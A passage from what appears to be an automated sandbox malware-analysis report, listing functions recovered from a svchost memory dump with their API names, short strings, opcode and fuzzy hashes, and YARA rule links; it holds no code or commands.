                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 4dd6e9819385993a33c4928075c13d7e72d6ff784883d3569d8b25ec7c09e6e3
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: DE31AF21B01B5187EA51DF56E44C769A7E8FB56F91F0C80209E8A23B54EF3CD4A9C781
                                                        Function 000002A661301934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: e1dd1258c5261a04da8618229e7ec079af13366636c2869e31bd1f927bcd4418
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 2C015771B04A4087EA10DB12A89C35A62A9F789FD4F488134DE8A53758DF3CC98AC781
                                                        Function 000002A661303B00 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: 6ed2c90be072456ea9a4bd697f2fd10eb4d467ec23d608173af05e33368ab2c7
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: F1111B25B01B4087EB25DB22E80D71977E8AB4AF55F080425C94F67764EF3DC64CC702
                                                        Function 000002A6613019D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: ec1b6f25bef38d2063cdb20bcb1da5f9fd383d8b2700952db0105f78bebcc860
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: 29F08C7274468093EB20DB25E89C39973B4F789F99F888020DA4A57968DF7CC68DCB01
                                                        Function 000002A66130330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: acbe1909f79230598a35ed9adc7c1bbb906d6631c637f76bf5b0bf99aec116dd
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 9DF05820B04B8093EA10DB13F94D1997668AB4AFE1F0C81319E9B27B28CF2CC49A8301
                                                        Function 000002A66130A258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 07c1bbe4bd8fa36892a6acb05d92240b6e010a04fd6df588d3c163491b032429
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: 8CF05861B21A0083FB449F60F88D36837A8AB8AF51F4C2429940B67660CF2CC48CC702
                                                        Function 000002A6613054F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: df798411ffdd1e079f6ec0f7e0163927004e3dd69baf84aa45194ce4d626a18f
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: DB02EB32619B8487EB60CB55F49835AB7E4F3C6B91F141015EA8E97BA8DF7CC488CB41
                                                        Function 000002A661310980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 000002A6613109C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002A66131093F,?,?,?,000002A66130E263), ref: 000002A661310A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002A66131093F,?,?,?,000002A66130E263), ref: 000002A661310B0A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: a7c031cb47e0da5df3db95bfe4ff753df23f7a458a82281f936f31c8550ff9fb
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: B081CD22F106508BFB109F21888E3AD36A8F346F98F488115DE0BB7A95DF3CC469C712
                                                        Function 000002A661305B30 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: 1477b44af3bc5b2e11128b243148cabb83ef55db588efe9a889fe495fa95e10e
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: 6A61C832A18B8487EB60DB15E44C31A77E4F38AB45F145216EA8E97BA8DF7CC548CF41
                                                        Function 000002A6612E13D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: d0be51bb97c77e0ad5bdb36d0dfb571661a8787d0f5a0318a365b3a9312d08c6
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 87114F62F50A9103F7541334E45E3A5107DEB96F64F1C4634AA760B7D6AF2C8BC94103
                                                        Function 000002A661311FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 5d0b80dcd1d52c1e52f0ea186871689deea632be76c95cad4b0f4eefd2fb3a69
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 13115122F50A4107F7581634E65F366704AAB57B74F3C4724AE773B3D68F1C8889C106
                                                        Function 000002A661303BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: a993612211386aae288452f10f62fbca7a8037bf902ba64a4ade7fa5b27061ce
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 0E115B2AB04B4087EF14DB26E44D66A76A8F78AF95F080029DE8E57794EF3DC64CC741
                                                        Function 000002A661303558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: f4eb0129fd14240ef0102f3e0811ff151b87a391b843d24c61ac8060cb080afb
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 29119325B04B8097FB10D725EC4D79A67E8F786B91F4840219E4EA3794EF2DC90DC782
                                                        Function 000002A6613014A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: 1daf3469cd6de168c41f071deeb24fc07ab5ba2376be75abb320c7fbf3975a19
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 04014832A00A90C7E704EFA6E80D24977B4FB8AF94F084435EA4A63728DF38C059C741
                                                        Function 000002A661302618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: df8aa83f03d2fd4b7502ab1c9e283bf49b84e0899f070c7dc1244de843f897e2
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 8C71A436B0078147EB65DE36994C7AA6BE8F38AF85F480015ED4B63B95DF38C6098781
                                                        Function 000002A6612DD178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 870dcabaa3d7d3f9cd9dc2d94d530f91ef4db72a297b243bfe3d14b4eac83292
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: FE616D22F00A4883FBA89B29D55C36D6AACEF42F50F1C4415DA4A177E5DF7CC9C98A12
                                                        Function 000002A661302408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: abdb4a8d6153689e566b0b83c39c78e2385abbb7c75edc36dd3933eac7855ee4
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: D2519822B0438183E674DE35A56C3AAA7E9F386B81F480015DE4B23B59DF3EC50C97C5
                                                        Function 000002A661310724 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: 444756d706f330fdcf8bd50708be853e2a46aed5e08064c78c4eb5f749973874
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: E941E232B14B4482EB20DF25E84D3AA77A4F789B94F494021EE8E97788DF3CC459CB41
                                                        Function 000002A66130D7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 60d1c5e23022e7c7b18395f28c59f8c027c170bd43f4b64b0faf1f76f73bcbdd
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 36111D36B08B8086D760CB15F44839AB7A9F7C9BD4F584126EE8E53B59CF3CC5548B40
                                                        Function 000002A6613095F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
